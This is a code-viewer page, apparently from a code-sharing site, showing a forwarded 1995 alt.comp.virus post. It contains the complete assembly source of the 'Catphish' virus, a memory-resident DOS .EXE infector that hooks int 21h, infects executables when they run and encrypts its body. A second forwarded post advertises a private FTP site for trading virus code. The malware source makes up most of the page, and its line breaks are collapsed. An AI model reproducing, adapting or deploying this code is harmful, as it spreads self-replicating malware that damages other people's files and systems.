📄 catphish.asm
字号:
From smtp Sun Jan 29 16:25 EST 1995Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 ESTDate: Sun, 29 Jan 1995 16:18:52 -0500 (EST)From: ids.net!JOSHUAW (JOSHUAW)To: pobox.jwu.edu!joshuaw Content-Length: 11874Content-Type: textMessage-Id: <950129161852.10074@ids.net>Status: ROTo: joshuaw@pobox.jwu.eduSubject: (fwd) CATPHISH.ASMNewsgroups: alt.comp.virusPath: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mailFrom: jdmathew@mtu.edu (Icepick)Newsgroups: alt.comp.virusSubject: CATPHISH.ASMDate: 26 Jan 1995 13:06:15 -0500Organization: Michigan Technological UniversityLines: 486Message-ID: <3g8oan$54g@maxwell11.ee>NNTP-Posting-Host: maxwell11.ee.mtu.eduX-Newsreader: TIN [version 1.2 PL1]name VIRUSTEST titlecode segment assume cs:code, ds:code, es:code org 100h;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+; The Catphish Virus.;; The Catphish virus is a resident .EXE infector.; Size: 678 bytes (decimal).; No activation (bomb).; Saves date and file attributes.;; If assembling, check_if_resident jump must be marked over; with nop after first execution (first execution will hang; system).;; *** Source is made available to learn from, not to; change author's name and claim credit! ***start: call setup ; Find "delta offset".setup: pop bp sub bp, offset setup-100h jmp check_if_resident ; See note above about jmp!pre_dec_em: mov bx,offset infect_header-100h add bx,bp mov cx,endcrypt-infect_headerror_em: mov dl,byte ptr cs:[bx] ror dl,1 ; Decrypt virus code mov byte ptr cs:[bx],dl ; by rotating right. inc bx loop ror_em jmp check_if_resident;--------------------------------- Infect .EXE header -----------------------; The .EXE header modifying code below is my reworked version of; Dark Angel's code found in his Phalcon/Skism virus guides.infect_header: push bx push dx push ax mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs ; ^---make sure you don't destroy the file handle mov cl, 4 ; Multiply by 16. Won't shl bx, cl ; work with headers > 4096 ; bytes. Oh well! sub ax, bx ; Subtract header size from sbb dx, 0 ; file size ; Now DX:AX is loaded with file size minus header size mov cx, 10h ; DX:AX/CX = AX Remainder DX div cx mov word ptr [buffer+14h-100h], dx ; IP Offset mov word ptr [buffer+16h-100h], ax ; CS Displacement in module mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS mov word ptr [buffer+10h-100h], 0A000h ; Starting SP pop ax pop dx add ax, endcode-start ; add virus size cmp ax, endcode-start jb fix_fault jmp execontwar_cry db 'Cry Havoc, and let slip the Dogs of War!',0v_name db '[Catphish]',0 ; Virus name.v_author db 'FirstStrike',0 ; Me.v_stuff db 'Kraft!',0fix_fault: add dx,1dexecont: push ax mov cl, 9 shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 mov word ptr [buffer+4-100h], dx ; Fix-up the file size in mov word ptr [buffer+2-100h], ax ; the EXE header. pop bx retn ; Leave subroutine;----------------------------------------------------------------------------check_if_resident: push es xor ax,ax mov es,ax cmp word ptr es:[63h*4],0040h ; Check to see if virus jnz grab_da_vectors ; is already resident jmp exit_normal ; by looking for a 40h ; signature in the int 63h ; offset section of ; interrupt table.grab_da_vectors: mov ax,3521h ; Store original int 21h int 21h ; vector pointer. mov word ptr cs:[bp+dos_vector-100h],bx mov word ptr cs:[bp+dos_vector+2-100h],esload_high: push dsfind_chain: ; Load high routine that ; uses the DOS internal mov ah,52h ; table function to find int 21h ; start of MCB and then ; scales up chain to mov ds,es: word ptr [bx-2] ; find top. (The code assume ds:nothing ; is long, but it is the ; only code that would xor si,si ; work when an infected ; .EXE was to be loadedMiddle_check: ; into memory. cmp byte ptr ds:[0],'M' jne Check4lastadd_one: mov ax,ds add ax,ds:[3] inc ax mov ds,ax jmp Middle_checkCheck4last: cmp byte ptr ds:[0],'Z' jne Error mov byte ptr ds:[0],'M' sub word ptr ds:[3],(endcode-start+15h)/16h+1 jmp add_oneerror: mov byte ptr ds:[0],'Z' mov word ptr ds:[1],008h mov word ptr ds:[3],(endcode-start+15h)/16h+1 push ds pop ax inc ax push ax pop esmove_virus_loop: mov bx,offset start-100h ; Move virus into carved add bx,bp ; out location in memory. mov cx,endcode-start push bp mov bp,0000hmove_it: mov dl, byte ptr cs:[bx] mov byte ptr es:[bp],dl inc bp inc bx loop move_it pop bphook_vectors: mov ax,2563h ; Hook the int 21h vector mov dx,0040h ; which means it will int 21h ; point to virus code in ; memory. mov ax,2521h mov dx,offset virus_attack-100h push es pop ds int 21h pop dsexit_normal: ; Return control to pop es ; infected .EXE mov ax, es ; (Dark Angle code.) add ax, 10h add word ptr cs:[bp+OrigCSIP+2-100h], ax cli add ax, word ptr cs:[bp+OrigSSSP+2-100h] mov ss, ax mov sp, word ptr cs:[bp+OrigSSSP-100h] sti xor ax,ax xor bp,bpendcrypt label byte db 0eahOrigCSIP dd 0fff00000hOrigSSSP dd ?exe_attrib dw ?date_stamp dw ?time_stamp dw ?dos_vector dd ?buffer db 18h dup(?) ; .EXE header buffer.;----------------------------------------------------------------------------virus_attack proc far assume cs:code,ds:nothing, es:nothing cmp ax,4b00h ; Infect only on file jz run_kill ; executions.leave_virus: jmp dword ptr cs:[dos_vector-100h]run_kill: call infectexe jmp leave_virusinfectexe: ; Same old working horse push ax ; routine that infects push bx ; the selected file. push cx push es push dx push ds mov cx,64d mov bx,dxfindname: cmp byte ptr ds:[bx],'.' jz o_k inc bx loop findnamepre_get_out: jmp get_outo_k: cmp byte ptr ds:[bx+1],'E' ; Searches for victims. jnz pre_get_out cmp byte ptr ds:[bx+2],'X' jnz pre_get_out cmp byte ptr ds:[bx+3],'E' jnz pre_get_outgetexe: mov ax,4300h call dosit mov word ptr cs:[exe_attrib-100h],cx mov ax,4301h xor cx,cx call dositexe_kill: mov ax,3d02h call dosit xchg bx,ax mov ax,5700h call dosit mov word ptr cs:[time_stamp-100h],cx mov word ptr cs:[date_stamp-100h],dx push cs pop ds mov ah,3fh mov cx,18h mov dx,offset buffer-100h call dosit cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker jnz infectforsure ; of 1993h in .EXE jmp close_it ; header checksum ; position.infectforsure: call move_f_ptrfar push ax push dx call store_header pop dx pop ax call infect_header push bx push cx push dx mov bx,offset infect_header-100h mov cx,(endcrypt)-(infect_header)rol_em: ; Encryption via mov dl,byte ptr cs:[bx] ; rotating left. rol dl,1 mov byte ptr cs:[bx],dl inc bx loop rol_em pop dx pop cx pop bx mov ah,40h mov cx,endcode-start mov dx,offset start-100h call dosit mov word ptr cs:[buffer+12h-100h],1993h call move_f_ptrclose mov ah,40h mov cx,18h mov dx,offset buffer-100h call dosit mov ax,5701h mov cx,word ptr cs:[time_stamp-100h] mov dx,word ptr cs:[date_stamp-100h] call dositclose_it: mov ah,3eh call dositget_out: pop ds pop dxset_attrib: mov ax,4301h mov cx,word ptr cs:[exe_attrib-100h] call dosit pop es pop cx pop bx pop ax retn;---------------------------------- Call to DOS int 21h ---------------------dosit: ; DOS function call code. pushf call dword ptr cs:[dos_vector-100h] retn;----------------------------------------------------------------------------;-------------------------------- Store Header -----------------------------store_header: les ax, dword ptr [buffer+14h-100h] ; Save old entry point mov word ptr [OrigCSIP-100h], ax mov word ptr [OrigCSIP+2-100h], es les ax, dword ptr [buffer+0Eh-100h] ; Save old stack mov word ptr [OrigSSSP-100h], es mov word ptr [OrigSSSP+2-100h], ax retn;---------------------------------------------------------------------------;---------------------------------- Set file pointer ------------------------move_f_ptrfar: ; Code to move file pointer. mov ax,4202h jmp short move_fmove_f_ptrclose: mov ax,4200hmove_f: xor dx,dx xor cx,cx call dosit retn;----------------------------------------------------------------------------endcode label byteendpcode endsend startFrom smtp Fri Jan 27 13:23 EST 1995Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 ESTDate: Fri, 27 Jan 1995 13:21:38 -0500 (EST)From: ids.net!JOSHUAW (JOSHUAW)To: pobox.jwu.edu!joshuaw Content-Length: 1179Content-Type: binaryMessage-Id: <950127132138.b52b@ids.net>Status: ROTo: joshuaw@pobox.jwu.eduSubject: (fwd) Private Virii FTP SiteNewsgroups: alt.comp.virusPath: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mailFrom: yojimbo@crl.com (Douglas Mauldin)Newsgroups: alt.comp.virusSubject: Private Virii FTP SiteDate: 24 Jan 1995 22:01:53 -0800Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]Lines: 14Message-ID: <3g4pgh$ka2@crl12.crl.com>NNTP-Posting-Host: crl12.crl.comX-Newsreader: TIN [version 1.2 PL2]I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm always on the lookout for new viral material. If you'd like access, or like to trade, email me a list of your collection. Serious inquiries only. ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -